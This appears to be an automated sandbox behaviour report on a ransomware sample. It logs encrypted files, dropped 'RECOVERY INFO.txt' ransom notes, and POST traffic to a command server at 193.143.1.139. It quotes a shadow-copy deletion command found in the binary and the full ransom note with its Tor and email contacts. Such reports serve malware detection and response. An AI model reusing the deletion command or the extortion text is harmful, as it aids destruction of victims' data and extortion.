Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: 2b7cu0KwZl.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Spreading

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\Cache\
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File opened: C:\Documents and Settings\user\Local Settings\Adobe\
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File opened: C:\Documents and Settings\user\Local Settings\
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File opened: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-093411-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\

Networking

Source: RECOVERY INFO.txt62.0.dr String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
Source: unknown DNS query: name: api.ipify.org
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49737
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49772
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Host: api.ipify.org
Source: global traffic HTTP traffic detected: POST /Ujdu8jjooue/biweax.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=------------------------PARZD3yTW Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Content-Length: 1892 Host: 193.143.1.139
Source: global traffic HTTP traffic detected: POST /Ujdu8jjooue/biweax.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=------------------------fsYLw7JdO Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Content-Length: 1899 Host: 193.143.1.139
Source: unknown TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\3D003UC5\RECOVERY INFO.txt
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: unknown HTTP traffic detected: POST /Ujdu8jjooue/biweax.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=------------------------PARZD3yTW Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Content-Length: 1892 Host: 193.143.1.139
Source: 2b7cu0KwZl.exe String found in binary or memory: http://193.143.1.139/Ujdu8jjooue/biweax.php
Source: 2b7cu0KwZl.exe String found in binary or memory: http://api.ipify.org
Source: 2b7cu0KwZl.exe String found in binary or memory: http://api.ipify.orgunknown------------------------multipart/form-data;
Source: 2b7cu0KwZl.exe, 00000000.00000003.1852408139.000001F7CBE26000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1852516311.000001F7CA886000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl
Source: 2b7cu0KwZl.exe, 00000000.00000003.1852408139.000001F7CBE26000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1852516311.000001F7CA886000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d
Source: RECOVERY INFO.txt62.0.dr, RECOVERY INFO.txt283.0.dr, RECOVERY INFO.txt37.0.dr, RECOVERY INFO.txt10.0.dr, RECOVERY INFO.txt196.0.dr, RECOVERY INFO.txt304.0.dr, RECOVERY INFO.txt153.0.dr, RECOVERY INFO.txt89.0.dr, RECOVERY INFO.txt257.0.dr, RECOVERY INFO.txt155.0.dr, RECOVERY INFO.txt56.0.dr, RECOVERY INFO.txt52.0.dr, RECOVERY INFO.txt275.0.dr, RECOVERY INFO.txt115.0.dr, RECOVERY INFO.txt253.0.dr, RECOVERY INFO.txt106.0.dr, RECOVERY INFO.txt17.0.dr, RECOVERY INFO.txt111.0.dr, RECOVERY INFO.txt46.0.dr, RECOVERY INFO.txt66.0.dr, RECOVERY INFO.txt42.0.dr String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO

Spam, unwanted Advertisements and Ransom Demands

Source: 2b7cu0KwZl.exe, 00000000.00000000.1791805543.00007FF6882F3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: SeTakeOwnershipPrivilegeSeDebugPrivilegePowrProf.dllPowerSetActiveScheme\sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exep
Source: 2b7cu0KwZl.exe Binary or memory string: SeTakeOwnershipPrivilegeSeDebugPrivilegePowrProf.dllPowerSetActiveScheme\sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exep
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File moved: C:\Users\user\Desktop\ZBEDCJPBEY.xlsx
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File deleted: C:\Users\user\Desktop\ZBEDCJPBEY.xlsx
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File moved: C:\Users\user\Desktop\YPSIACHYXW\NIKHQAIQAU.png
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File deleted: C:\Users\user\Desktop\YPSIACHYXW\NIKHQAIQAU.png
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File moved: C:\Users\user\Desktop\VAMYDFPUND.mp3
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-cn\RECOVERY INFO.txt -> your data has been encrypted in order to return your files back you need decryption tool 1)download tor browser 2)open in tor browser link below and contact with us there: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76 or email: lazylazy@tuta.com backup email: help.service@anche.no limit for free decryption: 3 files up to 5mb (no database or backups)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\RECOVERY INFO.txt -> your data has been encrypted in order to return your files back you need decryption tool 1)download tor browser 2)open in tor browser link below and contact with us there: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76 or email: lazylazy@tuta.com backup email: help.service@anche.no limit for free decryption: 3 files up to 5mb (no database or backups)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pt-br\RECOVERY INFO.txt -> your data has been encrypted in order to return your files back you need decryption tool 1)download tor browser 2)open in tor browser link below and contact with us there: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76 or email: lazylazy@tuta.com backup email: help.service@anche.no limit for free decryption: 3 files up to 5mb (no database or backups)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pl-pl\RECOVERY INFO.txt -> your data has been encrypted in order to return your files back you need decryption tool 1)download tor browser 2)open in tor browser link below and contact with us there: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76 or email: lazylazy@tuta.com backup email: help.service@anche.no limit for free decryption: 3 files up to 5mb (no database or backups)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\RECOVERY INFO.txt -> your data has been encrypted in order to return your files back you need decryption tool 1)download tor browser 2)open in tor browser link below and contact with us there: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76 or email: lazylazy@tuta.com backup email: help.service@anche.no limit for free decryption: 3 files up to 5mb (no database or backups)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-sl\RECOVERY INFO.txt -> your data has been encrypted in order to return your files back you need decryption tool 1)download tor browser 2)open in tor browser link below and contact with us there: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76 or email: lazylazy@tuta.com backup email: help.service@anche.no limit for free decryption: 3 files up to 5mb (no database or backups)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\RECOVERY INFO.txt -> your data has been encrypted in order to return your files back you need decryption tool 1)download tor browser 2)open in tor browser link below and contact with us there: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76 or email: lazylazy@tuta.com backup email: help.service@anche.no limit for free decryption: 3 files up to 5mb (no database or backups)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\RECOVERY INFO.txt -> your data has been encrypted in order to return your files back you need decryption tool 1)download tor browser 2)open in tor browser link below and contact with us there: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76 or email: lazylazy@tuta.com backup email: help.service@anche.no limit for free decryption: 3 files up to 5mb (no database or backups)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\RECOVERY INFO.txt -> your data has been encrypted in order to return your files back you need decryption tool 1)download tor browser 2)open in tor browser link below and contact with us there: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76 or email: lazylazy@tuta.com backup email: help.service@anche.no limit for free decryption: 3 files up to 5mb (no database or backups)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\tr-tr\RECOVERY INFO.txt -> your data has been encrypted in order to return your files back you need decryption tool 1)download tor browser 2)open in tor browser link below and contact with us there: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76 or email: lazylazy@tuta.com backup email: help.service@anche.no limit for free decryption: 3 files up to 5mb (no database or backups)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_100_percent.pak entropy: 7.99972157706
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe entropy: 7.99559842063
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatRes.dll entropy: 7.99999027504
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe entropy: 7.99943763961
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe entropy: 7.9999451581
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\9c09c81a3293a6f9820cb9d43546c552972469999723291e28c55f33c87de532 entropy: 7.99953699082
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_200_percent.pak entropy: 7.99977671923
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\8c939f6ee06ca9717f7931e0accddd517b5609c30d56d0f8b83436eed1c18bb0 entropy: 7.99930818189
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_elf.dll entropy: 7.99985687655
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\8e880d7bb6ea337763272a03a43b29bbf6d776b389e773d2ea88f49e781bc7d9 entropy: 7.9988720778
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\921ae2be6f2c0c4f5d0612de464ac6be9b75354010d4c8c367cf25fe0bff1b16 entropy: 7.99744660153
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\COPYING.LGPLv2.1.txt entropy: 7.99350533667
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\icudtl.dat entropy: 7.99998450782
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe entropy: 7.99993514167
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\b3a5292904d011b22b8911cbdfc6f842a99f6f0814b738a7235ad3a269e258a4 entropy: 7.99960404887
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\bb0f587a0db0572a7f0897d4ad538a5fd91259f16df486474df5fa431209bf59 entropy: 7.9994441393
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\en-US.pak entropy: 7.99948323239
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\9c48d8ef015852b5905a97c1870055d3fa24fe16b9ab57e7f4909593af3e9322 entropy: 7.99959634894
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\abe617f1af7a43a8c0ef3145e53d5e69b32cca5362f7f2b262c53b1051dc4e1e entropy: 7.99945384551
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\resources.pak entropy: 7.99997629934
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\e22cc4414d69397e092363fd311bdcb60e201d571917209f69afb053169aeeef entropy: 7.99952819518
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\ffd5710fd5bff1cd638b7557a0f0b169446159bb972f75fe422e6eb3a2b043be entropy: 7.99951652986
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314559\1696333703 entropy: 7.99693058231
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1696408273 entropy: 7.99610942344
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1696420884 entropy: 7.99603129503
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsAlarms_8wekyb3d8bbwe!App entropy: 7.99512715955
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsSoundRecorder_8wekyb3d8bbwe!App entropy: 7.99481367213
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsStore_8wekyb3d8bbwe!App entropy: 7.99451653038
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsCalculator_8wekyb3d8bbwe!App entropy: 7.99505265413
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Explorer entropy: 7.99522099765
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_MediaPlayer32 entropy: 7.99531039351
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_AdministrativeTools entropy: 7.9954171701
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Computer entropy: 7.99455698021
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel entropy: 7.99532698994
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_RemoteDesktop entropy: 7.99474015618
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Photos_8wekyb3d8bbwe!App entropy: 7.99386998055
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Shell_RunDialog entropy: 7.99466450473
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cleanmgr_exe entropy: 7.9950766422
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cmd_exe entropy: 7.99554295732
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\ProgramData\USOPrivate\UpdateStore\store.db entropy: 7.99998577804
